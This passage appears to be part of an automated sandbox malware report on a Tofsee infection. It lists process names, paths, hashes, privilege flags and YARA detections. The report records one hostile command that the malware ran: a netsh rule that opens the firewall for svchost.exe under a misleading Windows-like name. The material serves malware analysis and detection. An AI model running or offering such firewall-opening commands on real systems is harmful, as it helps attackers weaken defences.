                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, Author: Joe Security

                                            Analysis Process: netsh.exe PID: 6744 Parent PID: 7124

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\netsh.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                            Imagebase:0x7ff77ba70000
                                            File size:82944 bytes
                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 3716 Parent PID: 6744

                                            General

                                            Start time:20:29:31
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: svchost.exe PID: 3000 Parent PID: 6888

                                            General

                                            Start time:20:29:32
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:svchost.exe
                                            Imagebase:0x12f0000
                                            File size:44520 bytes
                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security

                                            Analysis Process: 3D34.exe PID: 2832 Parent PID: 6404

                                            General

                                            Start time:20:29:35
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Imagebase:0x150000
                                            File size:537088 bytes
                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Disassembly

                                            Code Analysis

                                            Reset < >